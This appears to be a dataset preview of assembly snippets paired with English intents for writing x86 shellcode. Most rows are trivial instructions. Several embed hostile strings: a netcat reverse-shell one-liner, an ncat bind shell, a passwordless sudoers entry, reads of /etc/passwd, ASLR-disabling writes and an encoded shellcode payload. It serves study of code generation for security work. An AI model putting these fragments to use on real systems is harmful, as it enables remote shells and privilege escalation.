SNIPPETS
stringlengths 2
1.64k
| INTENTS
stringlengths 4
1.66k
|
|---|---|
call execute \n db "cp /bin/sh /tmp/shÓ
|
put db "cp /bin/sh /tmp/shÓ address on stack then jump to _esecute label
|
call internetreadfile
|
call function internetreadfile
|
call iprint
|
call the iprint function
|
call iprintlf
|
call the iprintlf function
|
call jmp_search
|
call jmp_search
|
call jmp_search
|
call the jmp_search function
|
call loader
|
call loader
|
call loader
|
call the loader function
|
call main
|
call the main function
|
call me
|
call the me function
|
call my_subroutine
|
call my_subroutine
|
call near stageaddress
|
call near stageaddress
|
call near stageaddress
|
call the near function
|
call one
|
call the one function
|
call one \n string: db "/etc/passwd"
|
push the address of string: db "/etc/passwd" on the top of the stack, and then change the eip to the address in one_label
|
call open
|
jump to open_label
|
call prepare
|
call the prepare function
|
call prepare \n db ',ajm,pk#########'
|
go to prepere after storing string on the stack
|
call quit
|
call the quit function
|
call returnlabel
|
call returnlabel
|
call set_argv
|
call set_argv
|
call set_argv
|
call the set_argv function
|
call set_argv \n cmd: db "cat /etc/passwd;echo do__ne"
|
go to _set_argv label afeter entering the byte string cmd = cat /etc/passwd;echo do__ne on stack
|
call shell_ret
|
call the shell_ret function
|
call shell_ret \n db Ò/bin/shÓ
|
go to shell_ret label after ebtering byte string Ò/bin/shÓ address on stack
|
call shellcode
|
jump to the address of shellcode_label
|
call shellcode
|
call the shellcode function
|
call shellcode \n db '/proc/sys/kernel/randomize_va_space'
|
go to _shellcode label after entering the address of the string = Ô/proc/sys/kernel/randomize_va_space' on the top of the stack
|
call shellcode \n db '/proc/sys/kernel/randomize_va_spacex'
|
go to _shellcode label after entering the byte string '/proc/sys/kernel/randomize_va_spacex' address on stack
|
call shellcode \n db 'my.txtx'
|
go to _shellcode label after entering the byte string Ômt.txtxÕ address on the top of the stack
|
call shellcode \n message db "/bin/sh"
|
push the address of /bin/sh on the top of the stack, and then change the eip to the address in shellcode_label
|
call shellcode \n port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77
|
go to shellcode label after entering port: db db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 address on stack
|
call shellcode db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd'
|
jump to shellcode_label after entering the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' on the top of the stack
|
call sprint
|
call the sprint function
|
call sprintlf
|
call the sprintlf function
|
call start
|
call the start function
|
call strlen
|
call the strlen function
|
call two
|
call the two function
|
call write
|
go to _write label
|
call write
|
call the write function
|
call write \n db "all all=(all) nopasswd: all" , 0xa
|
entring db "all all=(all) nopasswd: all" , 0xa address on stack, then jump to _write label
|
call writestring
|
call writestring
|
call writestring
|
call the writestring function
|
call writestring \n db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fr"
|
go to _writestring label after entering the byte string "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fr" address on the top of the stack
|
call_decoded:
|
define call_decoded_label
|
call_decoded:
|
define the call_decoded label
|
call_decoded: \n call [esp]
|
define call_decoded and execute it
|
call_decoder:
|
declare _call_decoder label
|
call_decoder:
|
define _call_decoder label
|
call_decoder:
|
define call_decoder label
|
call_decoder:
|
define call_decoder_label
|
call_decoder:
|
define call_decoder function
|
call_decoder:
|
define call_decoder
|
call_decoder:
|
call_decoder label
|
call_decoder:
|
define the call_decoder label
|
call_decoder: \n call decoder
|
define call_decoder and call decoder function
|
call_decoder: \n call decoder
|
define the call_decoder label and call the decoder function
|
call_decoder: \n call decoder
|
define call_decoder and call decoder
|
call_decoder: \n call decoder \n shellcode: db 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87
|
in the function call_decoder call the decoder routine and define shellcode as array of bytes 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87
|
call_egghunter:
|
define call_egghunter label
|
call_egghunter:
|
define the call_egghunter label
|
call_shellcode:
|
declare _call_shellcode label
|
call_shellcode:
|
declare call_shellcode_label
|
call_shellcode:
|
define call_shellcode_label
|
call_shellcode:
|
delcare call_shellcode_label
|
call_shellcode:
|
define call_shellcode label
|
call_shellcode:
|
define call_shellcode function
|
call_shellcode:
|
call_shellcode function
|
call_shellcode:
|
call_shellcode routine
|
call_shellcode:
|
declare the call_shellcode label
|
call_shellcode:
|
define the call_shellcode label
|
call_shellcode: \n call decoder
|
define the call_shellcode label and call the decoder function
|
call_shellcode: \n call decoder
|
define the call_shellcode function and call decoder
|
call_shellcode: \n call decoder
|
define call_shellcode and call decoder function
|
call_shellcode: \n call decoder
|
in call_shellcode call the decoder function
|
call_shellcode: \n call decoder
|
in call_shellcode execute the decoder routine
|
call_write:
|
define _call_write label
|
call_write:
|
define the call_write label
|
callit:
|
define the callit label
|
callme:
|
define the callme label
|
callpop:
|
define _ callpop label
|
callpop:
|
define the callpop function
|
callpop:
|
define the callpop label
|
cdq
|
convert the doubleword with sign (32 bit) provided in eax into the quadword with sign (64 bit) left in edx:eax
|
cdq
|
convert the doubleword with sign (32 bit) provided in eax into the quadword with sign (64 bit) left in edx:eax (clear eax and edx registers)
|
cdq
|
zero out edx using the sign bit from eax
|
cdq
|
save edx as a null byte
|
cdq
|
convert signed dword in eax to a signed quad word in edx:eax
|
cdq
|
set edx to 0
|
cdq
|
edx to 0
|
cdq
|
set edx = 0
|
cdq
|
overwriting edx with either 0
|
cdq
|
zero out edx
|
cdq
|
clear the edx register
|
cdq
|
extend the sign bit of the eax register into the edx register
|
cdq
|
extend the sign bit of eax register into the edx register
|
cdq
|
extend the sign bit of eax into the edx register
|
cdq \n mov ecx, edx
|
zero out edx and ecx regsiter
|
cdq \n push edx
|
zero out edx and push ortocol id = 0 on stack
|
check_even_odd:
|
define check_even_odd label
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.